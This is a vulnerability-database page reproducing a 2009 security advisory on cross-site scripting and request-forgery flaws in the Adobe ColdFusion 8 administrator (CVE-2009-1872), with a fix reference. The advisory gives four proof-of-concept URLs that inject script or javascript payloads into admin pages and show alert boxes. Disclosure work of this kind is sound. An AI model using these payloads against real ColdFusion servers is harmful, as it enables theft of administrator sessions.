Vulners
Lucene search
Adobe Coldfusion 8 XSS / XSRF
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | CVE-2009-1872 | 17 Aug 200900:00 | – | circl |
 | Adobe ColdFusion <= 8.0.1 _logintowizard.cfm XSS | 2 Nov 200900:00 | – | nessus |
 | Adobe ColdFusion Server Cross-Site Request Forgery (APSB09-12; CVE-2009-1872) | 14 Sep 200900:00 | – | checkpoint_advisories |
 | CVE-2009-1872 | 18 Aug 200922:00 | – | cve |
 | CVE-2009-1872 | 18 Aug 200922:00 | – | cvelist |
 | Adobe Coldfusion <=8.0.1 - Cross-Site Scripting | 5 Jun 202603:02 | – | nuclei |
 | CVE-2009-1872 | 18 Aug 200922:30 | – | nvd |
 | Cross site scripting | 18 Aug 200922:30 | – | prion |
 | [DSECRG-09-022] Adobe Coldfusion 8 Multiple Linked XSS Vulnerabilies | 17 Aug 200900:00 | – | securityvulns |
| Adobe Coldfusion crossite scripting | 17 Aug 200900:00 | – | securityvulns |
10
`
http://www.dsecrg.com/pages/vul/show.php?id=122
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-022
Application: Adobe Coldfusion 8
Versions Affected: Adobe Coldfusion 8
Vendor URL: http://adobe.com
Bugs: Multiple Linked XSS,XSRF
Exploits: YES
Reported: 12.01.2009
Vendor response: 13.01.2009
Date of Public Advisory: 17.08.2009
CVE-number: CVE-2009-1872
Author: Alexander Polyakov
Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)
Description
***********
Multiple Linked XSS and XSRF vulnerabilities found in Adobe Coldfusion Server 8. Attacker can create evil link and steal administrators cookie
Details
*******
1. Multiple Linked XSS vulnerabilities found in Adobe Coldfusion Server 8.
1.1 Linked XSS vulnerability found in script searchlog.cfm. vulnerable parameter startRow
Example
*******
http://localhost:8500/CFIDE/administrator/logviewer/searchlog.cfm?viewShort=0&sortBy=&filter=CurrentFilter&startRow=22%22%20%20STYLE=%22background-image:url(javascript:alert(%27%DF%20%E7%E4%E5%F1%FC%20%E1%FB%EB%27))%22%3E
1.2 Linked XSS vulnerability found in script _logintowizard.cfm. Attacker can inject XSS in url string
Example
*******
http://localhost:8500/CFIDE/wizards/common/_logintowizard.cfm?>'"><script>alert('DSECRG_XSS')</script>
1.3 Linked XSS vulnerability found in script _authenticatewizarduser.cfm. Attacker can inject XSS in url string
Example
*******
http://localhost:8500/CFIDE/wizards/common/_authenticatewizarduser.cfm?>'"><script>alert('DSECRG_XSS')</script>
1.4 Linked XSS vulnerability found in script _authenticatewizarduser.cfm.Attacker can inject XSS in url string
Example
*******
http://localhost:8500/CFIDE/administrator/enter.cfm?>'"><script>alert('DSECRG_XSS')</script>
Fix Information
***************
The issue has been solved 17 august 2009. http://www.adobe.com/go/apsb09-12
References:
***********
http://www.adobe.com/go/apsb09-12
http://www.dsecrg.com/pages/vul/show.php?id=122
About
*****
Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.
Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com
--
Ñ óâàæåíèåì,
research mailto:[email protected]
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Aug 2009 00:00Current
0.3Low risk
Vulners AI Score0.3
EPSS0.08902